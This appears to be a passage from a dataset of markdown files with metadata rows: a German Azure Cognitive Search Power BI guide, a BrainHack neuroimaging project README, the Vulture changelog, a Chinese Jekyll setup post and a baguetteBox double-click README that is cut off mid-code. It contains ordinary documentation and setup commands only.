Protokollen und Metriken zu beginnen. Es kann bis zu einer Stunde dauern, bis die Container mit diesen Protokollen im Blobspeicher angezeigt werden. Es wird ein Container **insights-logs-operationlogs** für Suchdatenverkehrsprotokolle und ein Container **insights-metrics-pt1m** angezeigt. 1. Suchen Sie die Power BI-App für Azure Cognitive Search im [Marketplace für Power BI-Apps](https://appsource.microsoft.com/marketplace/apps), und installieren Sie sie in einem neuen oder vorhandenen Arbeitsbereich. Die App wird **Azure Cognitive Search: Analyze Logs and Metrics** genannt. 1. Nachdem Sie die App installiert haben, wählen Sie die App in der Liste der Apps in Power BI aus. :::image type="content" source="media/search-monitor-logs-powerbi/azure-search-app-tile.png" alt-text="Screenshot mit der Azure Cognitive Search-App zum Auswählen aus der Liste der Apps."::: 1. Wählen Sie **Verbinden** aus, um die Verbindung mit Ihren Daten herzustellen. :::image type="content" source="media/search-monitor-logs-powerbi/get-started-with-your-new-app.png" alt-text="Screenshot, der zeigt, wie Sie eine Verbindung mit Ihren Daten in der Azure Cognitive Search-App herstellen."::: 1. Geben Sie den Namen des Speicherkontos ein, das die Datei enthält. Standardmäßig betrachtet die App die Daten der letzten 10 Tage, aber dieser Wert kann mit dem Parameter **Tage** geändert werden. :::image type="content" source="media/search-monitor-logs-powerbi/connect-to-storage-account.png" alt-text="Screenshot, der zeigt, wie der Speicherkontoname und die Anzahl der Abfragetage auf der Seite „Herstellen einer Verbindung mit Azure Cognitive Search“ eingegeben wird."::: 1. Wählen Sie **Schlüssel** als Authentifizierungsmethode aus, und geben Sie Ihren Speicherkontoschlüssel an. Wählen Sie **Privat** als Datenschutzebene aus. Klicken Sie auf „Anmelden“, und beginnen Sie den Ladevorgang. :::image type="content" source="media/search-monitor-logs-powerbi/connect-to-storage-account-step-two.png" alt-text="Screenshot, der zeigt, wie die Authentifizierungsmethode, der Kontoschlüssel und die Datenschutzebene auf der Seite „Herstellen einer Verbindung mit Azure Cognitive Search“ eingegeben werden."::: 1. Warten Sie, bis die Daten aktualisiert sind. Dies kann eine Weile dauern, je nachdem, wie viele Daten Sie nutzen. Der folgende Indikator zeigt Ihnen, ob die Daten noch aktualisiert werden. :::image type="content" source="media/search-monitor-logs-powerbi/workspace-view-refreshing.png" alt-text="Screenshot, der zeigt, wie die Informationen auf der Seite „Datenaktualisierung“ gelesen werden."::: 1. Nachdem die Datenaktualisierung abgeschlossen ist, wählen Sie **Azure Cognitive Search-Bericht** aus, um den Bericht anzuzeigen. :::image type="content" source="media/search-monitor-logs-powerbi/workspace-view-select-report.png" alt-text="Screenshot, der zeigt, wie der Azure Cognitive Search-Bericht auf der Seite „Datenaktualisierung“ ausgewählt wird."::: 1. Aktualisieren Sie die Seite nach dem Öffnen des Berichts unbedingt, damit sie mit Ihren Daten geöffnet wird. :::image type="content" source="media/search-monitor-logs-powerbi/powerbi-search.png" alt-text="Screenshot des Azure Cognitive Search Power BI-Berichts."::: ## <a name="how-to-change-the-app-parameters"></a>So ändern Sie die App-Parameter Wenn Sie Daten aus einem anderen Speicherkonto visualisieren oder die Anzahl der Tage, deren Daten abgefragt werden sollen, ändern möchten, führen Sie die folgenden Schritte aus, um die Parameter **Tage** und **StorageAccount** zu ändern. 1. Navigieren Sie zu ihren Power BI-Apps, suchen Sie Ihre Azure Cognitive Search-App, und wählen Sie die Schaltfläche **App bearbeiten** aus, um den Arbeitsbereich anzuzeigen. :::image type="content" source="media/search-monitor-logs-powerbi/azure-search-app-tile-edit.png" alt-text="Screenshot, der zeigt, wie die Schaltfläche „App bearbeiten“ für die Azure Cognitive Search-App ausgewählt wird."::: 1. Wählen Sie aus den Datasetoptionen **Einstellungen** aus. :::image type="content" source="media/search-monitor-logs-powerbi/workspace-view-select-settings.png" alt-text="Screenshot, der zeigt, wie Sie „Einstellungen“ aus den Azure Cognitive Search-Datasetoptionen auswählen"::: 1. Ändern Sie auf der Registerkarte „Datasets“ die Parameterwerte, und wählen Sie **Anwenden** aus. Wenn ein Problem mit der Verbindung vorliegt, aktualisieren Sie die Anmeldeinformationen für die Datenquelle auf derselben Seite. 1. Navigieren Sie zurück zum Arbeitsbereich, und wählen Sie **Jetzt aktualisieren** aus den Datasetoptionen aus. :::image type="content" source="media/search-monitor-logs-powerbi/workspace-view-select-refresh-now.png" alt-text="Screenshot, der zeigt, wie Sie „Jetzt aktualisieren“ aus den Azure Cognitive Search-Datasetoptionen auswählen"::: 1. Öffnen Sie den Bericht, um die aktualisierten Daten anzuzeigen. Möglicherweise müssen Sie den Bericht auch aktualisieren, um die neuesten Daten anzuzeigen. ## <a name="troubleshooting"></a>Problembehandlung Wenn Sie feststellen, dass Ihre Daten nicht angezeigt werden, befolgen Sie diese Schritte zur Problembehandlung: 1. Öffnen Sie den Bericht, und aktualisieren Sie die Seite, um sicherzustellen, dass Sie die neuesten Daten anzeigen. Der Bericht enthält eine Option zum Aktualisieren der Daten. Wählen Sie diese Option aus, um die neuesten Daten zu erhalten. 1. Stellen Sie sicher, dass der angegebene Speicherkontoname und der angegebene Zugriffsschlüssel korrekt sind. Der Speicherkontoname sollte dem Konto entsprechen, das mit ihren Suchdienstprotokollen konfiguriert wurde. 1. Vergewissern Sie sich, dass Ihr Speicherkonto die Container **insights-logs-operationlogs** und **insights-metrics-pt1m** und jeder Container Daten enthält. Die Protokolle und Metriken befinden sich in einigen Ordnerebenen. 1. Überprüfen Sie, ob das Dataset weiterhin aktualisiert wird. Der Aktualisierungsstatusindikator wird oben in Schritt 8 angezeigt. Wenn die Aktualisierung noch immer ausgeführt wird, warten Sie, bis die Aktualisierung beendet ist, um den Bericht zu öffnen und zu aktualisieren. ## <a name="next-steps"></a>Nächste Schritte [Weitere Informationen zu Azure Cognitive Search](./index.yml) [Was ist Power BI?](/power-bi/fundamentals/power-bi-overview) [Grundlegende Konzepte für Designer im Power BI-Dienst](/power-bi/service-basic-concepts)
86.542857
433
0.792891
deu_Latn
0.99308
6f6489ef4c65dbac84019dd0688df28b0a9b34f0
7,751
md
Markdown
README.md
brainhack-school2020/BHS_project_jonathan
b765eba4390342910336fc3b64af43a8db5ff6b7
[ "CC0-1.0" ]
null
null
null
README.md
brainhack-school2020/BHS_project_jonathan
b765eba4390342910336fc3b64af43a8db5ff6b7
[ "CC0-1.0" ]
3
2020-05-21T23:23:32.000Z
2020-06-04T19:23:23.000Z
README.md
brainhack-school2020/BHS_project_Jonathan
b765eba4390342910336fc3b64af43a8db5ff6b7
[ "CC0-1.0" ]
null
null
null
[![](https://img.shields.io/badge/Visit-our%20project%20page-ff69b4)](https://school.brainhackmtl.org/project/template) # Visualization of functional connectivity from multimodal neuroimaging data - Jonathan Team contributors: Jonathan Gallego, Brainhack School ![BrainHack School](bhs2020.png) ## Summary - Hi!, I'm a first year PhD student at McGill. My BHS project aimed to use some of the visualization tools we have learned to display functional connectivity results from both MEG and fMRI data. - I used data from 12 subjects from the Human Connectome Project (https://www.humanconnectome.org). - I would love to hear from other people projects and see what they have achieved so far! Twitter: @jogaru1818 ### What I wanted to learn - To manage and analyze data in Python (since I have always worked on Matlab) - To use some specific tools for neuroimaging analysis (such as nilearn) - Try different visualization tools for displaying functional connectivity (that could be appliable to different neuroimaging modalities) - To "Live the experience" of collaborating with others through GitHub ## Project definition ### Background - Although MEG and fMRI are very different signals, they both reflect some aspects of neuronal activity - Functional connectivity assess the statistical dependence between the activity (time-series) of different brain regions - After preprocessing the data individually, we can have both modalities in the same coordinate space, parcellate the brain according to a common atlas and extract the MEG and fMRI time-series of each brain region. - We then could then compute connectivity measures and visualize the results from both modalities in parallel! ### Tools I employed - Human Connectomme Dataset: As the Open data repository I used for my BHS project - Git: to keep version control of my files - GitHub: To create a repository compiling all the resources employed for this project and make it reproducible. - Python: As the programming language I used to manipulate manipulate the data. - Jupyter notebook: As a resource to organize and document the code (with instructions and outputs) I used my project. - Nilearn tools: As a tool for calculating and displaying functional connectivity from neuroimaging data - Brainstorm (for MEG processing). Works on Matlab. ### Data specifications For this project I used data from 12 subjects from the Human Connectome Project, including: - Preprocessed high resolution anatomical MR scan - Preprocessed fMRI resting state data (sesion 1) - Unprocessed MEG resting state data - Unprocessed MEG noise recordings - Anatomical info for MEG registration. These data can be easily downloaded after creating an account and accessing the Human Connectome Project database (https://db.humanconnectome.org/). The HCP_data_dowload.md file contains a brief set of instructions of how to get the specific data used for this project ### Deliverables A GitHub repository containing a small set of md files and jupyter notebooks documenting all the requirements, instructions and code needed to reproduce this project. ### Progress overview and results 1 The first step was to install all the required software and libraries I needed for my project, and preparing the work environment. Detailed instructions on the requirements you need to fulfil to run the code and replicate these analysis are presented in the requirements.md file 2 After installing all the requiered dependencies and dowloading the HCP data I started working on the MEG data. Since the already processed source space MEG data available in the HCP database cannot be manipulated in many ways, I decided to download the raw data and preprocess it myself. I was very interested in learning to perform all these steps using some of the new tools we explored, however I knew this would not be feasible given the limited time we had for our project, so I performed the preprocessing using a software I am already familiar with (Brainstorm). Once I preprocessed the MEG data and performed a source estimation analysis, I extracted the timeseries of the 148 regions from the Destrieux atlas (2009) for each subject, concatenated them and exported them into a text file. The order of the labels of the scouts was consisted with that used for the fMRI analysis. The detailed step by step description of the MEG processing is contained in the MEG_processing.md file. 3 For the fMRI data, I opted to use the preprocessed images. I employed functions from nilearn to load the brain parcellations of the Destrieux atlas and the preprocessed fMRI data. As the HCP resting state fMRI consist on 1200 3d brain volumes, loading all the dataset at the same time may cause memory saturation on a regular machine. Therefore, I segmented the nifti files into smaller chunks of data, and created a python code to load each chunk at the time, extract the fMRI timeseries of each scout and concatenated the data for each subject and then from all subjects, and save it into a single matrix. The code used to extract the time series from the fMRI data is contained in the fMRI_timeseries.ipynb jupyter notebook. 4 After having extracted the MEG and fMRI timeseries from the scouts of the atlas I ellaborated a simple code to create a couple of interactive figures to display the functional connectivity matrices and graphs I obtained from the data. These interactive figures allow to easily navigate through the data from all subjects and switch between modalities. The final output of steps 2 and 3 is stored in the all_subjects_time_series_meg.txt and all_subjects_time_series_fmri.txt files, which contain the extracted timeseries of all subjects, for each modality. This last step loads these files, and use a combination of nilearn tools and ipywidgets to create and display an interactive figure within a jupyter notebook. An example of the fMRI connectivity matrix of Subject 1 ![fMRI_example_matrix](fmri_matrix_example.png) An example of the MEG delta band connectivity matrix of Subject 1 ![MEG_matrix_example](meg_matrix_example.png) ## Conclusion and acknowledgement During the lasts weeks I spent a lot of time getting familiar with these new tools. I knew I would face many problems and that most of the time I would spend looking at documentation files or forums trying to debug things. However, in the end I feel happy with the final result, given that I learned a lot of new cool things and that this represent a first step into adopting these practices on my daily work. I finally took the time to learn the basics from Python and now I will be able to use the rich variety of libraries they offer for analyzing and visualizing data. I also plan to adopt the use of virtual environments and containers for future projects. I also learned to document my work using git and to collaborate with other people through GitHub, which are both valuable resources to promote scietific reproducibility. Overall, I belive this was a great an useful experience for me, and I will definitively start using some of these tools to improve my practices as a student an future researcher I would like to acknowledge all the BHS organizers for investing their time and effort for developing this magnificent course! I would also like to thank to my clinic instructors for assessing me during my project (Valentina, Tristan and Pierre) and to all my peers from this BHS edition for sharing their comments and ideas throughout these weeks ## LINK TO WEEK 3 DERIVABLE Here is the link for the notebook containing the code to generate the interactive figure produced as the derivable for week 3 https://github.com/brainhack-school2020/jogaru1818_BHS/blob/master/week_3_derivable_Jonathan_Gallego.ipynb
88.079545
1,009
0.808799
eng_Latn
0.999422
6f64a9ae8a91d74737f05fef29096843a6fda412
72
md
Markdown
README.md
isaac-nadar/track-trace-mobileApp
c8c70c14c83060db2b790745286ff9051ad66d99
[ "MIT" ]
null
null
null
README.md
isaac-nadar/track-trace-mobileApp
c8c70c14c83060db2b790745286ff9051ad66d99
[ "MIT" ]
null
null
null
README.md
isaac-nadar/track-trace-mobileApp
c8c70c14c83060db2b790745286ff9051ad66d99
[ "MIT" ]
null
null
null
# track-trace-mobileApp An app for shipment tracking made with flutter.
24
47
0.805556
eng_Latn
0.986354
6f650c6efa3cb646cab19f61176ee632fb41b995
8,449
md
Markdown
CHANGELOG.md
ju-sh/vulture
48f4b3ded26eeb83131fa12caf0b0522e9f14135
[ "MIT" ]
null
null
null
CHANGELOG.md
ju-sh/vulture
48f4b3ded26eeb83131fa12caf0b0522e9f14135
[ "MIT" ]
null
null
null
CHANGELOG.md
ju-sh/vulture
48f4b3ded26eeb83131fa12caf0b0522e9f14135
[ "MIT" ]
null
null
null
# unreleased * Only parse format strings when being used with `locals()` (jingw, #225). * Don't override paths in pyproject.toml with empty CLI paths (bcbnz, #228). * Run continuous integration tests for Python 3.9 (ju-sh, #232). * Use pathlib internally (ju-sh, #226). # 2.1 (2020-08-19) * Treat `getattr/hasattr(obj, "constant_string", ...)` as a reference to `obj.constant_string` (jingw, #219). * Fix false positives when assigning to `x.some_name` but reading via `some_name`, at the cost of potential false negatives (jingw, #221). * Allow reading options from `pyproject.toml` (Michel Albert, #164, #215). # 2.0 (2020-08-11) * Parse `# type: ...` comments if on Python 3.8+ (jingw, #220). * Bump minimum Python version to 3.6 (Jendrik Seipp, #218). The last Vulture release that supports Python 2.7 and Python 3.5 is version 1.6. * Consider all files under `test` or `tests` directories test files (Jendrik Seipp). * Ignore `logging.Logger.propagate` attribute (Jendrik Seipp). # 1.6 (2020-07-28) * Differentiate between functions and methods (Jendrik Seipp, #112, #209). * Move from Travis to GitHub actions (RJ722, #211). # 1.5 (2020-05-24) * Support flake8 "noqa" error codes F401 (unused import) and F841 (unused local variable) (RJ722, #195). * Detect unreachable code in conditional expressions (Agathiyan Bragadeesh, #178). # 1.4 (2020-03-30) * Ignore unused import statements in `__init__.py` (RJ722, #192). * Report first decorator's line number for unused decorated objects on Python 3.8+ (RJ722, #200). * Check code with black and pyupgrade. # 1.3 (2020-02-03) * Detect redundant 'if' conditions without 'else' blocks. * Add whitelist for `string.Formatter` (Joseph Bylund, #183). # 1.2 (2019-11-22) * Fix tests for Python 3.8 (#166). * Use new `Constant` AST node under Python 3.8+ (#175). * Add test for f-strings (#177). * Add whitelist for `logging` module. # 1.1 (2019-09-23) * Add `sys.excepthook` to `sys` whitelist. * Add whitelist for `ctypes` module. * Check that type annotations are parsed and type comments are ignored (thanks @kx-chen). * Support checking files with BOM under Python 2.7 (#170). # 1.0 (2018-10-23) * Add `--ignore-decorators` flag (thanks @RJ722). * Add whitelist for `threading` module (thanks @andrewhalle). # 0.29 (2018-07-31) * Add `--ignore-names` flag for ignoring names matching the given glob patterns (thanks @RJ722). # 0.28 (2018-07-05) * Add `--make-whitelist` flag for reporting output in whitelist format (thanks @RJ722). * Ignore case of `--exclude` arguments on Windows. * Add `*-test.py` to recognized test file patterns. * Add `failureException`, `longMessage` and `maxDiff` to `unittest` whitelist. * Refer to actual objects rather than their mocks in default whitelists (thanks @RJ722). * Don't import any Vulture modules in setup.py (thanks @RJ722). # 0.27 (2018-06-05) * Report `while (True): ... else: ...` as unreachable (thanks @RJ722). * Use `argparse` instead of `optparse`. * Whitelist Mock.return\_value and Mock.side\_effect in unittest.mock module. * Drop support for Python 2.6 and 3.3. * Improve documentation and test coverage (thanks @RJ722). # 0.26 (2017-08-28) * Detect `async` function definitions (thanks @RJ722). * Add `Item.get_report()` method (thanks @RJ722). * Move method for finding Python modules out of Vulture class. # 0.25 (2017-08-15) * Detect unsatisfiable statements containing `and`, `or` and `not`. * Use filenames and line numbers as tie-breakers when sorting by size. * Store first and last line numbers in Item objects. * Pass relevant options directly to `scavenge()` and `report()`. # 0.24 (2017-08-14) * Detect unsatisfiable `while`-conditions (thanks @RJ722). * Detect unsatisfiable `if`- and `else`-conditions (thanks @RJ722). * Handle null bytes in source code. # 0.23 (2017-08-10) * Add `--min-confidence` flag (thanks @RJ722). # 0.22 (2017-08-04) * Detect unreachable code after `return`, `break`, `continue` and `raise` (thanks @RJ722). * Parse all variable and attribute names in new format strings. * Extend ast whitelist. # 0.21 (2017-07-26) * If an unused item is defined multiple times, report it multiple times. * Make size estimates for function calls more accurate. * Create wheel files for Vulture (thanks @RJ722). # 0.20 (2017-07-26) * Report unused tuple assignments as dead code. * Report attribute names that have the same names as variables as dead code. * Let Item class inherit from `object` (thanks @RJ722). * Handle names imported as aliases like all other used variable names. * Rename Vulture.used\_vars to Vulture.used\_names. * Use function for determining which imports to ignore. * Only try to import each whitelist file once. * Store used names and used attributes in sets instead of lists. * Fix estimating the size of code containing ellipses (...). * Refactor and simplify code. # 0.19 (2017-07-20) * Don't ignore <span class="title-ref">\_\_foo</span> variable names. * Use separate methods for determining whether to ignore classes and functions. * Only try to find a whitelist for each defined import once (thanks @roivanov). * Fix finding the last child for many types of AST nodes. # 0.18 (2017-07-17) * Make <span class="title-ref">--sort-by-size</span> faster and more accurate (thanks @RJ722). # 0.17 (2017-07-17) * Add <span class="title-ref">get\_unused\_code()</span> method. * Return with exit code 1 when syntax errors are found or files can't be read. # 0.16 (2017-07-12) * Differentiate between unused classes and functions (thanks @RJ722). * Add --sort-by-size option (thanks @jackric and @RJ722). * Count imports as used if they are accessed as module attributes. # 0.15 (2017-07-04) * Automatically include whitelists based on imported modules (thanks @RJ722). * Add --version parameter (thanks @RJ722). * Add appveyor tests for testing on Windows (thanks @RJ722). # 0.14 (2017-04-06) * Add stub whitelist file for Python standard library (thanks @RJ722) * Ignore class names starting with "Test" in "test\_" files (thanks @thisch). * Ignore "test\_" functions only in "test\_" files. # 0.13 (2017-03-06) * Ignore star-imported names since we cannot detect whether they are used. * Move repository to GitHub. # 0.12 (2017-01-05) * Detect unused imports. * Use tokenize.open() on Python \>= 3.2 for reading input files, assume UTF-8 encoding on older Python versions. # 0.11 (2016-11-27) * Use the system's default encoding when reading files. * Report syntax errors instead of aborting. # 0.10 (2016-07-14) * Detect unused function and method arguments (issue #15). * Detect unused \*args and \*\*kwargs parameters. * Change license from GPL to MIT. # 0.9 (2016-06-29) * Don't flag attributes as unused if they are used as global variables in another module (thanks Florian Bruhin). * Don't consider "True" and "False" variable names. * Abort with error message when invoked on .pyc files. # 0.8.1 (2015-09-28) * Fix code for Python 3. # 0.8 (2015-09-28) * Do not flag names imported with "import as" as dead code (thanks Tom Terrace). # 0.7 (2015-09-26) * Exit with exitcode 1 if path on commandline can't be found. * Test vulture with vulture using a whitelist module for false positives. * Add tests that run vulture as a script. * Add "python setup.py test" command for running tests. * Add support for tox. * Raise test coverage to 100%. * Remove ez\_setup.py. # 0.6 (2014-09-06) * Ignore function names starting with "test\_". * Parse variable names in new format strings (e.g. "This is {x}".format(x="nice")). * Only parse alphanumeric variable names in format strings and ignore types. * Abort with exit code 1 on syntax errors. * Support installation under Windows by using setuptools (thanks Reuben Fletcher-Costin). # 0.5 (2014-05-09) * If dead code is found, exit with 1. # 0.4.1 (2013-09-17) * Only warn if a path given on the command line cannot be found. # 0.4 (2013-06-23) * Ignore unused variables starting with an underscore. * Show warning for syntax errors instead of aborting directly. * Print warning if a file cannot be found. # 0.3 (2012-03-19) * Add support for python3 * Report unused attributes * Find tuple assignments in comprehensions * Scan files given on the command line even if they don't end with .py # 0.2 (2012-03-18) * Only format nodes in verbose mode (gives 4x speedup). # 0.1 (2012-03-17) * First release.
30.723636
76
0.715588
eng_Latn
0.976759
6f6536525632712c14f5d72877794f5910cd1770
4,970
markdown
Markdown
_posts/2018-11-05-welcome-to-jekyll.markdown
mlegin-hll/mlegin-hll.github.io
986c1baa083685f49212f03ee5d077204bd6389f
[ "MIT" ]
null
null
null
_posts/2018-11-05-welcome-to-jekyll.markdown
mlegin-hll/mlegin-hll.github.io
986c1baa083685f49212f03ee5d077204bd6389f
[ "MIT" ]
7
2018-12-02T21:57:14.000Z
2018-12-04T10:05:55.000Z
_posts/2018-11-05-welcome-to-jekyll.markdown
mlegin-hll/mlegin-hll.github.io
986c1baa083685f49212f03ee5d077204bd6389f
[ "MIT" ]
null
null
null
--- layout: post title: "安装 Jekyll!" date: 2018-11-07 21:40:36 -0500 categories: jekyll update author: wangxiaofeng@hualala.com tags: jekyll markdown --- # 一、jekyll简介 jekyll是一个简单的免费的Blog生成工具,可以看做一个将markdown文件生成静态网站的工具,并且他可以免费部署在github上,结合github Pages,我们可以在自己的github.io上看我们的markdown“静态网站” [jekyll-docs]: https://jekyllrb.com/docs/home [jekyll-gh]: https://github.com/jekyll/jekyll [jekyll-talk]: https://talk.jekyllrb.com/ # 二、安装 clone 项目到本地 ``` git clone http://git.hualala.com/hualala_mall/jekyllBlog ``` 安装启动jekyll ``` gem install jekyll //没有gem请自行google配置ruby环境 gem install bundler //Bundler 是管理Gem相依性的工具 gem install minima //主题 jekyll -v //查看版本 bundle //安装依赖的Gem文件 bundle exec jekyll server //进入项目目录,启动本地服务 ``` 启动浏览器,输入 `127.0.0.1:4000` 查看结果 ### 安装执行错误排查 运行jekyll 命令报错 ``` /System/Library/Frameworks/Ruby.framework/Versions/2.3/usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require': cannot load such file -- bundler (LoadError) ``` 原因未安装bundler 解决方法: 命令需要sudo ``` gem install bundler ``` 依然报错 ``` /System/Library/Frameworks/Ruby.framework/Versions/2.3/usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require': cannot load such file -- bundler (LoadError) ``` 解决 ``` gem install minima ``` 运行jekyll serve报错 ``` WARN: Unresolved specs during Gem::Specification.reset: rouge (< 4, >= 1.7) WARN: Clearing out unresolved specs. Please report a bug if this causes problems. /usr/local/lib/ruby/gems/2.4.0/gems/bundler-1.17.1/lib/bundler/spec_set.rb:91:in `block in materialize': Could not find concurrent-ruby-1.1.3 in any of the sources (Bundler::GemNotFound) from /usr/local/lib/ruby/gems/2.4.0/gems/bundler-1.17.1/lib/bundler/spec_set.rb:85:in `map!' from /usr/local/lib/ruby/gems/2.4.0/gems/bundler-1.17.1/lib/bundler/spec_set.rb:85:in `materialize' from /usr/local/lib/ruby/gems/2.4.0/gems/bundler-1.17.1/lib/bundler/definition.rb:170:in `specs' from /usr/local/lib/ruby/gems/2.4.0/gems/bundler-1.17.1/lib/bundler/definition.rb:237:in `specs_for' from /usr/local/lib/ruby/gems/2.4.0/gems/bundler-1.17.1/lib/bundler/definition.rb:226:in `requested_specs' from /usr/local/lib/ruby/gems/2.4.0/gems/bundler-1.17.1/lib/bundler/runtime.rb:108:in `block in definition_method' from /usr/local/lib/ruby/gems/2.4.0/gems/bundler-1.17.1/lib/bundler/runtime.rb:20:in `setup' from /usr/local/lib/ruby/gems/2.4.0/gems/bundler-1.17.1/lib/bundler.rb:107:in `setup' from /usr/local/lib/ruby/gems/2.4.0/gems/jekyll-3.8.5/lib/jekyll/plugin_manager.rb:50:in `require_from_bundler' from /usr/local/lib/ruby/gems/2.4.0/gems/jekyll-3.8.5/exe/jekyll:11:in `<top (required)>' from /usr/local/bin/jekyll:22:in `load' from /usr/local/bin/jekyll:22:in `<main>' ``` 解决方法: 删除 Gemfile.lock # 三、使用 - 添加文章 文章都放在_posts目录下,格式需要严格按照年-月-日-文章名.markdown/md 文件开头参照默认格式 ``` --- layout: post title: "post title" // 文章标题 date: 2018-11-29 09:56:49 +0800 categories: js react react-native //文章分类信息 tags: markdown --- ``` - 文章提交: ``` git commit -am 'you new blog title' git push ``` - jekyll 使用图片 ``` [图片pic1]({{ "/assets/images4post/pic1.jpg" | absolute_url }}) jekyll框架下post中引用asset资源目录的图片语法(绝对路径)如下: ![图片pic1]({{ "/assets/images4post/pic1.jpg" | absolute_url }}) ``` [图片pic1]({{ "/assets/img/hero.jpg"}}) 样例 ![](/assets/img/hero.jpg) - 使用tag(修改于12-3切换h2o主题) ``` --- layout: post title: "post title" // 文章标题 date: 2018-11-29 09:56:49 +0800 categories: js react react-native //文章分类信息 tags: markdown --- ``` h2o主题可以自动识别并提取tag分类,照上文添加tag即可 # 四、整合disqus评论(12-3) 现在主流第三方评论系统有gitalk,disqus等 gitalk是国人编写,使用github oauth app获取github中repo的读写权限,使得该repo的issue可以在博客中使用,我们的系统没有放在公有github上,故此插件难以使用。 disqus是国外编写的第三方插件,包含评论功能,但使用时需要翻墙,否则看不见,集成步骤如下: 1. 注册Disqus并拿到你的shortname [参照链接](https://damoqiongqiu.github.io/jekyll/2017/07/07/%E5%88%A9%E7%94%A8github%E5%92%8Cjekyll%E6%90%AD%E5%BB%BA%E4%B8%AA%E4%BA%BABlog-12.html) 需要翻墙 2. 在jekyll的h2o主题中集成 - _config.yml中 ``` # Comments 评论功能 comments: disqus: true disqus_url: 'https://leginm.disqus.com/embed.js' ``` - _layouts/_post中 ``` {% if site.comments.disqus %} <section class="post-footer-item comment"> <div id="disqus_thread"></div> </section> {% endif %} ``` ``` {% if site.comments.disqus %} <script> var disqus_config = function () { this.page.url = PAGE_URL; // Replace PAGE_URL with your page's canonical URL variable this.page.identifier = PAGE_IDENTIFIER; // Replace PAGE_IDENTIFIER with your page's unique identifier variable }; */ (function() { // DON'T EDIT BELOW THIS LINE var d = document, s = d.createElement('script'); s.src = 'https://md-22city-cn.disqus.com/embed.js'; s.setAttribute('data-timestamp', +new Date()); (d.head || d.body).appendChild(s); })(); </script> {% endif %} ``` 文件结构已经写好,只要改相应参数就可 done~ [Markdown Cheatsheet](https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet)
24.243902
186
0.704225
yue_Hant
0.399035
6f65bcd8bc51961635bdb4c6a58efa95b6da5120
697
md
Markdown
README.md
yves-ledermann/ESP8266-Homie-SolarRoof
741919e9ccd1e54350bc5ab7101ffcdccd5c6f16
[ "MIT" ]
2
2017-02-13T01:58:42.000Z
2017-02-13T01:58:44.000Z
README.md
yves-ledermann/ESP8266-Homie-SolarRoof
741919e9ccd1e54350bc5ab7101ffcdccd5c6f16
[ "MIT" ]
null
null
null
README.md
yves-ledermann/ESP8266-Homie-SolarRoof
741919e9ccd1e54350bc5ab7101ffcdccd5c6f16
[ "MIT" ]
null
null
null
# esp8266_Homie-SolarRoof Firmware for the esp8266 PlatformIO build enviroment. ESP8266 powered Node with some oneWire Temperature Sensors, LDR, DHT22, BMP280 Homie Framework, Modbus TCP Slave (for easy connection with codesys PLC) TO DO: - Node for DHT22 - Node for BMP180 - Node for LDR Resistor - Dynamic Homie Nodes for each Temp Sensors - Modbus Holding Registers with all Values - clean up the code - seperate nodes from main project for easier maint & reuse //TO-DO // Set Alarms // Sensor.setHighAlarmTemp(sensorValues.Address, 30); //Sensor.setLowAlarmTemp(sensorValues.Address, 22); Got a lot of code from https://github.com/euphi/ Thank you @euphi *** need to write more text***
24.892857
78
0.76901
eng_Latn
0.737599
6f6622765952489ba566dbcc3672e79ef7cca404
4,465
md
Markdown
README_of_double_click_trigger_feature.md
Paper-Folding/baguetteBox.js
8040cb9df8f008305332664dd1f757fa2d183d5b
[ "MIT" ]
null
null
null
README_of_double_click_trigger_feature.md
Paper-Folding/baguetteBox.js
8040cb9df8f008305332664dd1f757fa2d183d5b
[ "MIT" ]
null
null
null
README_of_double_click_trigger_feature.md
Paper-Folding/baguetteBox.js
8040cb9df8f008305332664dd1f757fa2d183d5b
[ "MIT" ]
1
2022-03-14T10:29:53.000Z
2022-03-14T10:29:53.000Z
# baguetteBox.js - With Double Click Trigger Option Added ## _Modified by Paper-Folding_ ## __[DECALRE]__ This project is forked from <https://github.com/feimosi/baguetteBox.js> and modified to add double click trigger functionality. ## __Documentation goes below:__ ## To enable double click trigger function, you just need to: > ### 1. Add attribute `bagDblClick` for every `<a>` tag that open baguetteBox originally. > ### 2. then set `dblTrigger` option to `true` like below: > ```javascript > baguetteBox.run('.grid', { > dblTrigger: true > }); > ``` > ### __[IMPORTANT] Do not apply href to `<a>` tag(or use `href='javascript:void(0)'` instead, if you want to enable single click feature, see step 3 below.)__ > ### 3. __[Optional]__ Use step1 and step2 above are able to trigger baguetteBox by double clicking images. But you may still want to make single click images to do other things, in that case, first you need to add an option `singleClickCallBack` and specify a function to it like below: > ```javascript > baguetteBox.run('.grid', { > dblTrigger: true, > singleClickCallBack: function (event, someParameters) { doSomething(event, 'Oh you pressed me!'); } > }); > ``` > ### then define this `doSomething` function like this: > ```javascript > function doSomething(event, msg) { > console.log(event.srcElement.src); // the parameter 'event' here is the event object our browser provided when we set a listener, you can get quite a lot info for it, for example here, it will print the image's src attribute in console when user single clicked it. > console.log(msg); // this 'msg' here is defined by you, you can pass anything to it and even add more parameters to the function itself. > } > ``` > ### Keep in mind that if you set `dblTrigger` to `false` which means you are not enable double click trigger feature, set the `singleClickCallBack` will take no effect. > ### __[Tip]__ You can define the timeout value that differentiates a double click and a single click by setting `doubleClickJudgeTimeout` option. If two successive clicks on an image has a time defference less than its value, it will be regraded as a double click, otherwise its a single click. This option's values is metered by milliseconds. > ### Below I've got a full example (ommitted unrelated parts): > ### __HTML__ > ```html ><div class="grid"> > <a href="javascript:void(0)" dblHref="img/2-1.jpg"> > <img src="img/thumbnails/2-1.jpg" alt="First image"> > </a> > <a href="javascript:void(0)" dblHref="img/2-2.jpg"> > <img src="img/thumbnails/2-2.jpg" alt="Second image"> > </a> > ... ></div> > ``` > ### __JS__ > ```javascript > baguetteBox.run('.grid', { > dblTrigger: true, > singleClickCallBack: function (event, someParameters) { doSomething(event, 'Oh you pressed me!'); }, > doubleClickJudgeTimeout: 200 > }); > > function doSomething(event, msg) { > console.log(event.srcElement.src); > console.log(msg); > } > ``` > ### 4. __[Optional]__ If you still want to implement with single click to trigger the baguetteBox, just do what the original developers said in their version.(You do not need to set `dblTrigger`, by default its value is `false`) I still offer an example here which you will see in the original developers' version. > ### __HTML__ > ```html ><div class="grid"> > <a href="img/2-1.jpg"> > <img src="img/thumbnails/2-1.jpg" alt="First image"> > </a> > <a href="img/2-2.jpg"> > <img src="img/thumbnails/2-2.jpg" alt="Second image"> > </a> > ... ></div> > ``` > ### __JS__ > ```javascript > 